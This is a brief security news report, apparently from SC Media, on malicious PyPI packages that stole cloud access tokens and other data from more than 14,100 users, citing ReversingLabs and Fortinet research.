Data Security, DevSecOps, Application security, Supply chain, Cloud Security

Thousands impacted by data exfiltrating PyPI packages

Digital Lock.

More than 14,100 users have been compromised with malicious Python Package Index packages that sought to pilfer cloud access tokens and other sensitive data before being removed from the repository, reports The Hacker News.

More than a quarter of the bogus packages were purporting to be time-related utilities leveraged for data exfiltration to attackers' infrastructure, while most of the remaining packages were for cloud services' adoption of cloud client functionalities, according to a ReversingLabs analysis.

Further examination of the nefarious packages revealed three to be dependencies of the widely used accesskey_tools project on GitHub.

Such findings come after thousands of PyPI and npm packages were reported by Fortinet FortiGuard Labs to have been utilized to facilitate malicious code injections.

"Suspicious URLs are a key indicator of potentially malicious packages, as they are often used to download additional payloads or establish communication with command-and-control (C&C) servers, giving attackers control over infected systems," said Fortinet FortiGuard Labs researcher Jenna Wang.

An In-Depth Guide to Application Security

Get essential knowledge and practical strategies to fortify your applications.

Get daily email updates

SC Media's daily must-read of the most current and pressing daily news

By clicking the Subscribe button below, you agree to SC Media Terms of Use and Privacy Policy.

You can skip this ad in 5 seconds